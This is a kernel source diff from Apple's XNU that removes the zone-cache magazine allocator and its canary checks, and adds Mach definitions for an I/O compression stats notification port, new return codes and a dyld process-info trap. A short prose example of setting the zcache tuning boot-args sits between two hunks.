-       /* Generate the canary value for zone caches */
-       zcache_canary = (uintptr_t) early_random();
-
-       magzone = zone_create("zcc_magazine_zone", magazine_size,
-           ZC_NOCACHING | ZC_ZFREE_CLEARMEM);
-
-       /*
-        * This causes zcache_ready() to return true.
-        */
-       os_atomic_store(&magazine_zone, magzone, compiler_acq_rel);
-
-       /*
-        * Now that we are initialized, we can enable zone caching for zones that
-        * were made before zcache_bootstrap() was called.
-        *
-        * The system is still single threaded so we don't need to take the lock.
-        */
-       zone_index_foreach(i) {
-               if (zone_array[i].cpu_cache_enabled) {
-                       zcache_init(&zone_array[i]);
-               }
-       }
-}
-STARTUP(ZALLOC, STARTUP_RANK_FOURTH, zcache_bootstrap);
-
-static struct zcc_magazine *
-zcache_mag_alloc(void)
-{
-       struct zcc_magazine *mag = zalloc_flags(magazine_zone, Z_WAITOK);
-       mag->zcc_magazine_capacity = magazine_element_count;
-       return mag;
-}
-
-
-/*
- * zcache_init
- *
- * Initializes all parts of the per-cpu caches for a given zone
- *
- * Parameters:
- * zone    pointer to zone on which to initialize caching
- *
- */
-void
-zcache_init(zone_t zone)
-{
-       struct zcc_per_cpu_cache *pcpu_caches;
-       struct zcc_depot         *depot;
-       vm_size_t size;
-
-       /*
-        * If zcache hasn't been initialized yet, remember our decision,
-        *
-        * zcache_init() will be called again by zcache_bootstrap(),
-        * while the system is still single threaded, to build the missing caches.
-        */
-       if (!zcache_ready()) {
-               zone->cpu_cache_enabled = true;
-               return;
-       }
-
-       /* Allocate chunk of memory for all structs */
-       size        = sizeof(struct zcc_depot) + (depot_element_count * sizeof(void *));
-       depot       = zalloc_permanent(size, ZALIGN_PTR);
-
-       size        = sizeof(struct zcc_per_cpu_cache);
-       pcpu_caches = zalloc_percpu_permanent(size, ZALIGN_PTR);
-
-       /* Initialize a cache for every CPU */
-       zpercpu_foreach(cache, pcpu_caches) {
-               cache->current = zcache_mag_alloc();
-               cache->previous = zcache_mag_alloc();
-               cache->zp_count = zone_poison_count_init(zone);
-       }
-
-       /* Initialize empty magazines in the depot list */
-       for (int i = 0; i < depot_element_count; i++) {
-               depot->zcc_depot_list[i] = zcache_mag_alloc();
-       }
-
-       lock_zone(zone);
-       if (zone->zcache.zcc_depot) {
-               panic("allocating caches for zone %s twice", zone->z_name);
-       }
-
-       /* Make the initialization of the per-cpu magazines visible. */
-       os_atomic_thread_fence(release);
-
-       zone->zcache.zcc_depot = depot;
-       zone->zcache.zcc_pcpu = pcpu_caches;
-       zone->cpu_cache_enabled = true;
-       unlock_zone(zone);
-}
-
-/*
- * zcache_drain_depot
- *
- * Frees all the full magazines from the depot layer to the zone allocator as part
- * of zone_gc(). The routine assumes that only one zone_gc() is in progress (zone_gc_lock
- * ensures that)
- *
- * Parameters:
- * zone    pointer to zone for which the depot layer needs to be drained
- *
- * Returns: None
- *
- */
-void
-zcache_drain_depot(zone_t zone)
-{
-       struct zcc_depot *depot;
-       int drain_depot_index = 0;
-
-       lock_zone(zone);
-       depot = zone->zcache.zcc_depot;
-       drain_depot_index = depot->zcc_depot_index;
-       for (int i = 0; i < drain_depot_index; i++) {
-               zcache_mag_drain_locked(zone, depot->zcc_depot_list[i]);
-       }
-#if ZALLOC_DETAILED_STATS
-       depot->zcc_gc += drain_depot_index;
-#endif /* ZALLOC_DETAILED_STATS */
-       depot->zcc_depot_index = 0;
-       unlock_zone(zone);
-}
-
-__attribute__((noinline))
-static void
-zcache_free_to_cpu_cache_slow(zone_t zone, struct zcc_per_cpu_cache *per_cpu_cache)
-{
-       struct zcc_depot *depot;
-
-       lock_zone(zone);
-       depot = zone->zcache.zcc_depot;
-       if (depot->zcc_depot_index < depot_element_count) {
-               /* If able, rotate in a new empty magazine from the depot and retry */
-               zcache_mag_depot_swap_for_free(depot, per_cpu_cache);
-       } else {
-               /* Free an entire magazine of elements */
-               zcache_mag_drain_locked(zone, per_cpu_cache->current);
-#if ZALLOC_DETAILED_STATS
-               depot->zcc_drain++;
-#endif /* ZALLOC_DETAILED_STATS */
-       }
-       unlock_zone(zone);
-}
-
-
-void
-zcache_free_to_cpu_cache(zone_t zone, zone_stats_t zstats, vm_offset_t addr)
-{
-       struct zcc_per_cpu_cache *per_cpu_cache;
-       vm_offset_t elem = addr;
-       int cpu;
-
-       zone_allocated_element_validate(zone, elem);
-
-       /*
-        * This is racy but we don't need zp_count to be accurate.
-        * This allows us to do the poisoning with preemption enabled.
-        */
-       per_cpu_cache = zpercpu_get(zone->zcache.zcc_pcpu);
-       if (zfree_clear_or_poison(zone, &per_cpu_cache->zp_count, elem)) {
-               addr |= ZALLOC_ELEMENT_NEEDS_VALIDATION;
-       } else {
-               zcache_canary_add(zone, elem);
-       }
-
-#if KASAN_ZALLOC
-       kasan_poison_range(elem, zone_elem_size(zone), ASAN_HEAP_FREED);
-#endif
-
-       disable_preemption();
-       cpu = cpu_number();
-       per_cpu_cache = zpercpu_get_cpu(zone->zcache.zcc_pcpu, cpu);
-
-       if (zcache_mag_has_space(per_cpu_cache->current)) {
-               /* If able, free into current magazine */
-       } else if (zcache_mag_has_space(per_cpu_cache->previous)) {
-               /* If able, swap current and previous magazine and retry */
-               zcache_swap_magazines(&per_cpu_cache->previous, &per_cpu_cache->current);
-       } else {
-               zcache_free_to_cpu_cache_slow(zone, per_cpu_cache);
-       }
-
-       struct zcc_magazine *mag = per_cpu_cache->current;
-       mag->zcc_elements[mag->zcc_magazine_index++] = addr;
-       zpercpu_get_cpu(zstats, cpu)->zs_mem_freed += zone_elem_size(zone);
-#if ZALLOC_DETAILED_STATS
-       per_cpu_cache->zcc_frees++;
-#endif /* ZALLOC_DETAILED_STATS */
-
-       enable_preemption();
-}
-
-__attribute__((noinline))
-static bool
-zcache_alloc_from_cpu_cache_slow(zone_t zone, struct zcc_per_cpu_cache *per_cpu_cache)
-{
-       struct zcc_depot *depot;
-
-       lock_zone(zone);
-       depot = zone->zcache.zcc_depot;
-       if (depot->zcc_depot_index > 0) {
-               /* If able, rotate in a full magazine from the depot */
-               zcache_mag_depot_swap_for_alloc(depot, per_cpu_cache);
-       } else if (zcache_mag_fill_locked(zone, per_cpu_cache->current)) {
-#if ZALLOC_DETAILED_STATS
-               depot->zcc_fill++;
-#endif /* ZALLOC_DETAILED_STATS */
-       } else {
-#if ZALLOC_DETAILED_STATS
-               depot->zcc_fail++;
-#endif /* ZALLOC_DETAILED_STATS */
-               /* If unable to allocate from cache return NULL and fall through to zalloc */
-               unlock_zone(zone);
-               enable_preemption();
-               return false;
-       }
-       unlock_zone(zone);
-
-       return true;
-}
-
-vm_offset_t
-zcache_alloc_from_cpu_cache(zone_t zone, zone_stats_t zstats, vm_size_t waste)
-{
-       struct zcc_per_cpu_cache *per_cpu_cache;
-       int cpu;
-
-       disable_preemption();
-       cpu = cpu_number();
-       per_cpu_cache = zpercpu_get_cpu(zone->zcache.zcc_pcpu, cpu);
-
-       if (zcache_mag_has_elements(per_cpu_cache->current)) {
-               /* If able, allocate from current magazine */
-       } else if (zcache_mag_has_elements(per_cpu_cache->previous)) {
-               /* If able, swap current and previous magazine and retry */
-               zcache_swap_magazines(&per_cpu_cache->previous, &per_cpu_cache->current);
-       } else if (!zcache_alloc_from_cpu_cache_slow(zone, per_cpu_cache)) {
-               return (vm_offset_t)NULL;
-       }
-
-       struct zcc_magazine *mag = per_cpu_cache->current;
-       vm_offset_t elem_size = zone_elem_size(zone);
-       uint32_t index = --mag->zcc_magazine_index;
-       vm_offset_t addr = mag->zcc_elements[index];
-       mag->zcc_elements[index] = 0;
-       zpercpu_get_cpu(zstats, cpu)->zs_mem_allocated += elem_size;
-#if ZALLOC_DETAILED_STATS
-       if (waste) {
-               zpercpu_get_cpu(zstats, cpu)->zs_mem_wasted += waste;
-       }
-       per_cpu_cache->zcc_allocs++;
-#else
-       (void)waste;
-#endif /* ZALLOC_DETAILED_STATS */
-
-       enable_preemption();
-
-#if ZALLOC_ENABLE_POISONING
-       bool validate = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION;
-#endif /* ZALLOC_ENABLE_POISONING */
-
-       addr &= ~ZALLOC_ELEMENT_NEEDS_VALIDATION;
-
-#if KASAN_ZALLOC
-       kasan_poison_range(addr, elem_size, ASAN_VALID);
-#endif
-#if ZALLOC_ENABLE_POISONING
-       if (!validate) {
-               vm_offset_t backup = addr + elem_size - sizeof(vm_offset_t);
-               zcache_validate_and_clear_canary(zone, (vm_offset_t *)addr,
-                   (vm_offset_t *)backup);
-       }
-       zalloc_validate_element(zone, addr, elem_size, validate);
-#endif /* ZALLOC_ENABLE_POISONING */
-
-       return addr;
-}
-
-
-/*
- * zcache_mag_fill_locked
- *
- * Fills a magazine with as many elements as the zone can give
- * without blocking to carve out more memory
- *
- * Parameters:
- * zone    zone from which to allocate
- * mag     pointer to magazine to fill
- *
- * Return:     True if able to allocate elements, false if the magazine is still empty
- */
-static bool
-zcache_mag_fill_locked(zone_t zone, struct zcc_magazine *mag)
-{
-       uint32_t i = mag->zcc_magazine_index;
-       uint32_t end = mag->zcc_magazine_capacity;
-       vm_offset_t elem, addr;
-
-       while (i < end && zone->countfree) {
-               addr = zalloc_direct_locked(zone, Z_NOWAIT, 0);
-               elem = addr & ~ZALLOC_ELEMENT_NEEDS_VALIDATION;
-               if (addr & ZALLOC_ELEMENT_NEEDS_VALIDATION) {
-                       zone_clear_freelist_pointers(zone, elem);
-               } else {
-                       zcache_canary_add(zone, elem);
-               }
-#if KASAN_ZALLOC
-               kasan_poison_range(elem, zone_elem_size(zone), ASAN_HEAP_FREED);
-#endif
-               mag->zcc_elements[i++] = addr;
-       }
-
-       mag->zcc_magazine_index = i;
-
-       return i != 0;
-}
-
-/*
- * zcache_mag_drain_locked
- *
- * Frees all elements in a magazine
- *
- * Parameters:
- * zone   zone to which elements will be freed
- * mag    pointer to magazine to empty
- *
- */
-static void
-zcache_mag_drain_locked(zone_t zone, struct zcc_magazine *mag)
-{
-       vm_offset_t elem, addr;
-       bool poison;
-
-       for (uint32_t i = 0, end = mag->zcc_magazine_index; i < end; i++) {
-               addr   = mag->zcc_elements[i];
-               poison = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION;
-               elem   = addr & ~ZALLOC_ELEMENT_NEEDS_VALIDATION;
-
-#if ZALLOC_ENABLE_POISONING
-               zcache_validate_element(zone, (vm_offset_t *)elem, poison);
-#endif /* ZALLOC_ENABLE_POISONING */
-               zfree_direct_locked(zone, elem, poison);
-               mag->zcc_elements[i] = 0;
-       }
-       mag->zcc_magazine_index = 0;
-}
-
-
-/*
- * zcache_mag_has_space
- *
- * Checks if magazine still has capacity
- *
- * Parameters:
- * mag    pointer to magazine to check
- *
- * Returns: true if the magazine still has space
- *
- */
-static bool
-zcache_mag_has_space(struct zcc_magazine *mag)
-{
-       return mag->zcc_magazine_index < mag->zcc_magazine_capacity;
-}
-
-
-/*
- * zcache_mag_has_elements
- *
- * Checks whether the magazine contains any elements
- *
- * Parameters:
- * mag    pointer to magazine to check
- *
- * Returns: true if the magazine has at least one element
- *
- */
-static bool
-zcache_mag_has_elements(struct zcc_magazine *mag)
-{
-       return mag->zcc_magazine_index > 0;
-}
-
-
-/*
- * zcache_swap_magazines
- *
- * Swaps two magazine pointers in place
- *
- * Parameters:
- * a           pointer to first pointer
- * b           pointer to second pointer
- */
-static void
-zcache_swap_magazines(struct zcc_magazine **a, struct zcc_magazine **b)
-{
-       struct zcc_magazine *temp = *a;
-       *a = *b;
-       *b = temp;
-}
-
-
-/*
- * zcache_mag_depot_swap_for_alloc
- *
- * Swaps a full magazine into the current position
- *
- * Parameters:
- * depot     pointer to the depot
- * cache     pointer to the current per-cpu cache
- *
- * Precondition: the depot list contains at least one full magazine
- */
-static void
-zcache_mag_depot_swap_for_alloc(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache)
-{
-       /* Loads a full magazine from which we can allocate */
-       assert(depot->zcc_depot_index > 0);
-       depot->zcc_depot_index--;
-#if ZALLOC_DETAILED_STATS
-       depot->zcc_swap++;
-#endif /* ZALLOC_DETAILED_STATS */
-       zcache_swap_magazines(&cache->current, &depot->zcc_depot_list[depot->zcc_depot_index]);
-}
-
-
-/*
- * zcache_mag_depot_swap_for_free
- *
- * Swaps an empty magazine into the current position
- *
- * Parameters:
- * depot     pointer to the depot
- * cache     pointer to the current per-cpu cache
- *
- * Precondition: the depot list contains at least one empty magazine
- */
-static void
-zcache_mag_depot_swap_for_free(struct zcc_depot *depot, struct zcc_per_cpu_cache *cache)
-{
-       /* Loads an empty magazine into which we can free */
-       assert(depot->zcc_depot_index < depot_element_count);
-       zcache_swap_magazines(&cache->current, &depot->zcc_depot_list[depot->zcc_depot_index]);
-#if ZALLOC_DETAILED_STATS
-       depot->zcc_swap++;
-#endif /* ZALLOC_DETAILED_STATS */
-       depot->zcc_depot_index++;
-}
-
-/*
- * zcache_canary_add
- *
- * Adds a canary to an element by storing (zcache_canary ^ element address) in the
- * first and last pointer-sized words of the element
- *
- * Parameters:
- * zone    zone for the element
- * addr    element address to add canary to
- */
-static void
-zcache_canary_add(zone_t zone, vm_offset_t element)
-{
-#if ZALLOC_ENABLE_POISONING
-       vm_offset_t *primary = (vm_offset_t *)element;
-       vm_offset_t *backup = (vm_offset_t *)((vm_offset_t)primary +
-           zone_elem_size(zone) - sizeof(vm_offset_t));
-       *primary = *backup = (zcache_canary ^ (uintptr_t)element);
-#else
-#pragma unused(zone, element)
-#endif
-}
-
-#if ZALLOC_ENABLE_POISONING
-__abortlike static void
-zcache_validation_panic(zone_t zone, vm_offset_t *primary, vm_offset_t *backup,
-    vm_offset_t permutation)
-{
-       vm_offset_t primary_value = 0;
-       vm_offset_t backup_value = 0;
-
-       if (permutation == zcache_canary) {
-               primary_value = *primary ^ (vm_offset_t)primary;
-               backup_value = *backup ^ (vm_offset_t)primary;
-               permutation = permutation ^ (vm_offset_t)primary;
-       } else {
-               primary_value = *primary;
-               backup_value = *backup;
-       }
-       if (primary_value != permutation) {
-               panic("Zone cache element was used after free! Element %p was corrupted at "
-                   "beginning; Expected 0x%lx but found 0x%lx; canary 0x%lx; zone %p (%s%s)",
-                   primary, (uintptr_t) permutation, (uintptr_t) *primary, zcache_canary, zone,
-                   zone_heap_name(zone), zone->z_name);
-       } else {
-               panic("Zone cache element was used after free! Element %p was corrupted at end; "
-                   "Expected 0x%lx but found 0x%lx; canary 0x%lx; zone %p (%s%s)",
-                   primary, (uintptr_t) permutation, (uintptr_t) *backup, zcache_canary, zone,
-                   zone_heap_name(zone), zone->z_name);
-       }
-}
-
-/*
- * zcache_validate_and_clear_canary
- *
- * Validates an element of the zone cache to make sure it still contains the zone
- * caching canary and clears it.
- *
- * Parameters:
- * zone    zone for the element
- * primary addr of canary placed in front
- * backup       addr of canary placed at the back
- */
-static void
-zcache_validate_and_clear_canary(zone_t zone, vm_offset_t *primary, vm_offset_t *backup)
-{
-       vm_offset_t primary_value = (*primary ^ (uintptr_t)primary);
-       vm_offset_t backup_value = (*backup ^ (uintptr_t)primary);
-
-       if (primary_value == zcache_canary && backup_value == zcache_canary) {
-               *primary = *backup = ZONE_POISON;
-       } else {
-               zcache_validation_panic(zone, primary, backup, zcache_canary);
-       }
-}
-
-/*
- * zcache_validate_element
- *
- * Validates the first and last pointer-sized words of the element to ensure
- * that they haven't been altered. This function is used when an
- * element moves from cache to zone, therefore it only validates the
- * first and last pointer-sized words (location of future freelist pointers).
- *
- * Parameters:
- * zone    zone for the element
- * element addr of element to validate
- * poison  has the element been poisoned
- */
-static void
-zcache_validate_element(zone_t zone, vm_offset_t *element, bool poison)
-{
-       vm_offset_t *primary = (vm_offset_t *)element;
-       vm_offset_t *backup = (vm_offset_t *)((vm_offset_t)primary +
-           zone_elem_size(zone) - sizeof(vm_offset_t));
-
-       if (zone->zfree_clear_mem) {
-               if (*primary == 0 && *backup == 0) {
-                       return;
-               } else {
-                       zcache_validation_panic(zone, primary, backup, 0);
-               }
-       }
-
-       if (__probable(!poison)) {
-               zcache_validate_and_clear_canary(zone, primary, backup);
-       } else {
-               if (*primary == ZONE_POISON && *backup == ZONE_POISON) {
-                       return;
-               } else {
-                       zcache_validation_panic(zone, primary, backup, ZONE_POISON);
-               }
-       }
-}
-#endif /* ZALLOC_ENABLE_POISONING */
diff --git a/osfmk/kern/zcache_internal.h b/osfmk/kern/zcache_internal.h
deleted file mode 100644 (file)
index 2cafb52..0000000
+++ /dev/null
@@ -1,206 +0,0 @@
-/*
- * Copyright (c) 2017-2020 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- *      Below is a diagram of the caching system. This design is based on the
- * paper "Magazines and Vmem: Extending the Slab Allocator to Many CPUs and
- * Arbitrary Resources" by Jeff Bonwick and Jonathan Adams. It is divided into 3
- * layers: the Per-cpu Layer, the Depot Layer, and the Zone Allocator. The
- * Per-CPU and Depot layers store elements using arrays we call magazines.
- *
- *      Magazines function like a stack (we push and pop elements) and can be
- *  moved around for bulk operations.
- *  _________         _________         _________
- * |  CPU 1  |       |  CPU 2  |       |  CPU 3  |
- * |  _   _  |       |  _   _  |       |  _   _  |
- * | |#| | | |       | | | |#| |       | |#| |#| |        Per-CPU Layer
- * | |#| |_| |       | |_| |#| |       | |#| |#| |
- * |_________|       |_________|       |_________|
- *
- *  ______________________________________________
- * |            _   _   _   _   _   _             |
- * |           |#| |#| |#| | | | | | |            |     Depot Layer
- * |           |#| |#| |#| |_| |_| |_|            |
- * |______________________________________________|
- *
- *  _______________________________________________
- * | # | # | # | # | # | # | # | # | # | # | # | # |   Zone Allocator
- * |_______________________________________________|
- *
- *     The top layer is the per-cpu cache and consists of a current and
- * previous magazine for each CPU. The current magazine is the one we always try
- * to allocate from and free to first. Only if we are unable, do we check the
- * previous magazine. If the previous magazine can satisfy the allocate or free,
- * then we switch the two and allocate from the new current magazine. This layer
- * requires no locking, so we can access multiple CPU's caches concurrently.
- * This is the main source of the speedup.
- *
- *      We have two magazines here to prevent thrashing when swapping magazines
- * with the depot layer. If a certain pattern of allocs and frees occurs, we
- * can waste a lot of time swapping magazines to and from the depot layer. We
- * prevent this by dividing the per-cpu cache into two separate magazines.
- *
- *     The middle layer is the magazine depot. This layer consists of a
- * collection of full and empty magazines. These are used to reload the per-cpu
- * caches when needed. This is implemented as an array of magazines which are
- * initially all empty and as we fill up magazines we increment the index to
- * point at the first empty magazine. Since this layer is per-zone, it allows us
- *  to balance the cache between cpus, but does require taking a lock.
- *
- *      When neither the current nor previous magazine for a given CPU can
- * satisfy the free or allocation, we look to the depot layer. If there are
- * magazines in the depot that can satisfy the free or allocation we swap
- * that magazine into the current position. In the example below, to allocate on
- * the given CPU we must lock the depot layer and swap magazine A with magazine
- * B and decrement the depot index.
- *
- *      _____________________       _______________________________________
- *     |    Per-CPU Cache    |     |              Depot Layer              |
- *     |                     |     |                                       |
- *     |   A___      ____    |     |   ____      B___      ____      ____  |
- *     |  |    |    |    |   |     |  | ## |    | ## |    |    |    |    | |
- *     |  |    |    |    |   |     |  | ## |    | ## |    |    |    |    | |
- *     |  |    |    |    |   |     |  | ## |    | ## |    |    |    |    | |
- *     |  |    |    |    |   |     |  | ## |    | ## |    |    |    |    | |
- *     |  |____|    |____|   |     |  |_##_|    |_##_|    |____|    |____| |
- *     | Current   Previous  |     |                                       |
- *     |_____________________|     |_______________________________________|
- *
- *     The bottom layer is the Zone Allocator. This is already implemented in
- *  XNU and will remain mostly unchanged. Implementation for this can be found
- * in zalloc.c and zalloc.h. We will only use the zone if all other layers are
- * unable to satisfy the allocation or free. When we do use the zone, we will
- * try to allocate an entire magazine of elements or free an entire magazine of
- * elements at once.
- *
- *      Caching must be enabled explicitly, by calling zone_create() with the
- * ZC_CACHING flag, for every zone you want to cache elements for. Zones
- * which are good candidates for this are ones with highly contended zone locks.
- *
- * Some good potential candidates are kalloc.16, kalloc.48, VM objects, VM map
- * entries, ipc vouchers, and ipc ports.
- *
- *
- * Some factors can be tuned by boot-arg:
- *  zcc_enable_for_zone_name    name of a single zone to enable caching for
- *                             (replace space characters with '.')
- *
- *  zcc_magazine_element_count integer value for magazine size used for all
- *                             zones (default 8 is used if not specified)
- *
- *  zcc_depot_element_count    integer value for how many full and empty
- *                             magazines to store in the depot, if N specified
- *                             depot will have N full and N empty magazines
- *                             (default 16 used if not specified)
- */
-
-#ifndef _KERN_ZCACHE_H_
-#define _KERN_ZCACHE_H_
-
-#include <kern/kern_types.h>
-#include <kern/zalloc.h> /* zone_stats_t */
-#include <vm/vm_kern.h>
-
-#if CONFIG_ZCACHE
-#pragma GCC visibility push(hidden)
-
-__BEGIN_DECLS
-
-struct zone_cache {
-       struct zcc_per_cpu_cache *__zpercpu zcc_pcpu;
-       struct zcc_depot         *zcc_depot;
-};
-
-/**
- * @function zcache_init
- *
- * @abstract
- * Initializes all parts of the per-cpu caches for a given zone
- *
- * @param zone      pointer to zone on which to initialize caching
- *
- */
-extern void zcache_init(
-       zone_t          zone);
-
-
-/**
- * @function zcache_free_to_cpu_cache()
- *
- * @abstract
- * Checks per-cpu caches to free element there if possible.
- *
- * @discussion
- * The caller is responsible for checking that caching is enabled for zone.
- *
- * @param zone      pointer to zone for which element comes from
- * @param zstats    pointer to the per-cpu statistics to maintain
- * @param addr      address of the element to free
- */
-extern void zcache_free_to_cpu_cache(
-       zone_t          zone,
-       zone_stats_t    zstats,
-       vm_offset_t     addr);
-
-
-/**
- * @function zcache_alloc_from_cpu_cache
- *
- * @abstract
- * Checks per-cpu caches to allocate element from there if possible
- *
- * @discussion
- * The caller is responsible for checking that caching is enabled for zone.
- *
- * @param zone      pointer to zone from which the element will come
- * @param zstats    pointer to the per-cpu statistics to maintain
- * @param waste     amount of waste of this allocation (or 0)
- *
- * @return          pointer to usable element
- */
-extern vm_offset_t zcache_alloc_from_cpu_cache(
-       zone_t          zone,
-       zone_stats_t    zstats,
-       vm_size_t       waste);
-
-/**
- * @function zcache_drain_depot
- *
- * @abstract
- * Frees all the full magazines from the depot layer to the zone allocator
- * Invoked by zone_gc()
- *
- * @param zone      pointer to zone for which the depot layer needs to be drained
- */
-extern void zcache_drain_depot(
-       zone_t          zone);
-
-__END_DECLS
-
-#pragma GCC visibility pop
-#endif /*  CONFIG_ZCACHE */
-#endif /* _KERN_ZCACHE_H_ */
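A short usage sketch for the zone-cache boot-args described in the zcache_internal.h comment above (the zone name and values here are hypothetical and shown only to illustrate the format, including the space-to-'.' substitution in the zone name):

    sudo nvram boot-args="zcc_enable_for_zone_name=vm.objects zcc_magazine_element_count=16 zcc_depot_element_count=32"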
index 08d6d75119fcafbbc09a58551a0f9b65649da105..516ab1443700ca792ba72c2af3b21ceaffe117d9 100644 (file)
@@ -64,7 +64,8 @@ MACH_PRIVATE_DEFS = \
        sysdiagnose_notification.defs \
        upl.defs \
        vfs_nspace.defs \
-       vm32_map.defs
+       vm32_map.defs \
+       iocompressionstats_notification.defs
 
 #
 # MIG-generated headers that are traditionally used by user
@@ -83,6 +84,7 @@ MIG_USHDRS = \
        task_access_server.h \
        telemetry_notification_server.h \
        sysdiagnose_notification_server.h \
+       iocompressionstats_notification_server.h \
        vfs_nspace_server.h
 
 MIG_UUHDRS = \
@@ -183,6 +185,7 @@ PRIVATE_DATAFILES = \
        coalition.h \
        coalition_notification.defs \
        fairplayd_notification.defs \
+       iocompressionstats_notification.defs \
        arcade_upcall.defs \
        host_info.h \
        ktrace_background.defs \
@@ -305,6 +308,7 @@ MIG_KUSRC = \
        resource_notify_user.c \
        task_access_user.c \
        telemetry_notification_user.c \
+       iocompressionstats_notification_user.c \
        upl_user.c \
        vfs_nspace_user.c \
        vm_map_user.c \
index b81e5494411c6bfff4ba9d0d40013e8a83d85075..7102db36941bdb048727658265ee873b2e1237b8 100644 (file)
@@ -30,3 +30,4 @@
 
 #define MACH_ARM_TRAP_ABSTIME -3
 #define MACH_ARM_TRAP_CONTTIME -4
+
index 31ee691b747c9c42a121d44aef7453fa4375e485..2f9f7274d2b79123ae80a0198809591f01ae58a2 100644 (file)
 #include <mach/port.h>
 #include <mach/thread_status.h>
 #include <mach/machine/vm_types.h>
+#include <mach_debug/ipc_info.h>
 /*
  * Exported types
  */
@@ -199,6 +200,7 @@ typedef exception_mask_t                *exception_mask_array_t;
 typedef exception_behavior_t            *exception_behavior_array_t;
 typedef thread_state_flavor_t           *exception_flavor_array_t;
 typedef mach_port_t                     *exception_port_array_t;
+typedef ipc_info_port_t                 *exception_port_info_array_t;
 typedef mach_exception_data_type_t      mach_exception_code_t;
 typedef mach_exception_data_type_t      mach_exception_subcode_t;
 
index d09b44b6b624b9fe1dcf928953ddd0819390130d..75ba5e69dc1535dbf3db9b8b8c1901fc1b7e0517 100644 (file)
 #define HOST_SYSPOLICYD_PORT            (22 + HOST_MAX_SPECIAL_KERNEL_PORT)
 #define HOST_FILECOORDINATIOND_PORT     (23 + HOST_MAX_SPECIAL_KERNEL_PORT)
 #define HOST_FAIRPLAYD_PORT             (24 + HOST_MAX_SPECIAL_KERNEL_PORT)
+#define HOST_IOCOMPRESSIONSTATS_PORT    (25 + HOST_MAX_SPECIAL_KERNEL_PORT)
 
-#define HOST_MAX_SPECIAL_PORT           HOST_FAIRPLAYD_PORT
-/* MAX = last since rdar://35861175 */
+#define HOST_MAX_SPECIAL_PORT           HOST_IOCOMPRESSIONSTATS_PORT
+/* MAX = last since rdar://59872249 */
 
 /* obsolete name */
 #define HOST_CHUD_PORT HOST_LAUNCHCTL_PORT
 #define host_set_fairplayd_port(host, port)     \
        (host_set_special_port((host), HOST_FAIRPLAYD_PORT, (port)))
 
+#define host_get_iocompressionstats_port(host, port)     \
+       (host_get_special_port((host),                  \
+       HOST_LOCAL_NODE, HOST_IOCOMPRESSIONSTATS_PORT, (port)))
+#define host_set_iocompressionstats_port(host, port)     \
+       (host_set_special_port((host), HOST_IOCOMPRESSIONSTATS_PORT, (port)))
+
+
 /* HOST_RESOURCE_NOTIFY_PORT doesn't #define these conveniences.
  *  All lookups go through send_resource_violation()
  */
diff --git a/osfmk/mach/iocompressionstats_notification.defs b/osfmk/mach/iocompressionstats_notification.defs
new file mode 100644 (file)
index 0000000..a46c314
--- /dev/null
@@ -0,0 +1,20 @@
+/*
+ * Copyright (c) 2020, Apple Inc.  All rights reserved.
+ */
+
+ /*
+ *  Interface definition for the I/O compression stats notification facility.
+ */
+
+subsystem
+#if    KERNEL_USER
+    KernelUser
+#endif /* KERNEL_USER */
+    iocompressionstats_notification 5600;
+
+#include <mach/std_types.defs>
+#include <mach/mach_types.defs>
+
+simpleroutine  iocompressionstats_notification(
+       RequestPort     iocompressionstats_port : mach_port_t;
+       in                      flags                   : uint32_t);
index d3218260086525cb87b44b15f079ba0cf0961015..addc157f14480037f77a51649d89d306f7e63c24 100644 (file)
 /* Denied by security policy
  */
 
+#define KERN_MISSING_KC                 54
+/* The KC on which the function is operating is missing
+ */
+
+#define KERN_INVALID_KC                 55
+/* The KC on which the function is operating is invalid
+ */
+
 #define KERN_RETURN_MAX                 0x100
 /* Maximum return value allowable
  */
index b7a9bdd1c65f66a526691eb18ced8b0dbd8087e9..7341d83d24984c8072809ca08095def664d1a7ee 100644 (file)
@@ -162,6 +162,11 @@ extern kern_return_t _kernelrpc_mach_vm_deallocate_trap(
        mach_vm_size_t size
        );
 
+extern kern_return_t task_dyld_process_info_notify_get(
+       mach_port_name_array_t names_addr,
+       natural_t *names_count_addr
+       );
+
 extern kern_return_t _kernelrpc_mach_vm_protect_trap(
        mach_port_name_t target,
        mach_vm_address_t address,
@@ -662,6 +667,14 @@ struct _kernelrpc_mach_vm_deallocate_args {
 extern kern_return_t _kernelrpc_mach_vm_deallocate_trap(
        struct _kernelrpc_mach_vm_deallocate_args *args);
 
+struct task_dyld_process_info_notify_get_trap_args {
+       PAD_ARG_(mach_vm_address_t, names_addr);     /* 2 words */
+       PAD_ARG_(mach_vm_address_t, names_count_addr);  /* 2 words */
+};                                               /* Total: 4 */
+
+extern kern_return_t task_dyld_process_info_notify_get_trap(
+       struct task_dyld_process_info_notify_get_trap_args *args);
+
 struct _kernelrpc_mach_vm_protect_args {
        PAD_ARG_(mach_port_name_t, target);     /* 1 word */
        PAD_ARG_(mach_vm_address_t, address);   /* 2 words */
index 25e03e78404b50f090af7c16988acc673f419401..8ef422d352d0fd5a75f9a2f3af0f682c58c385aa 100644 (file)
@@ -168,6 +168,14 @@ type task_read_t = mach_port_t
 #endif /* KERNEL_SERVER */
                ;
 
+type task_id_token_t = mach_port_t
+#if KERNEL_SERVER
+               intran: task_id_token_t convert_port_to_task_id_token(mach_port_t)
+               outtran: mach_port_t convert_task_id_token_to_port(task_id_token_t)
+               destructor: task_id_token_release(task_id_token_t)
